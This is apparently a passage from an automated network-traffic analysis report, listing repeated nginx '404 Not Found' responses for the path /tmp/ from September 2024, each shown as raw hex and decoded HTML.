20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:38 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:49 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
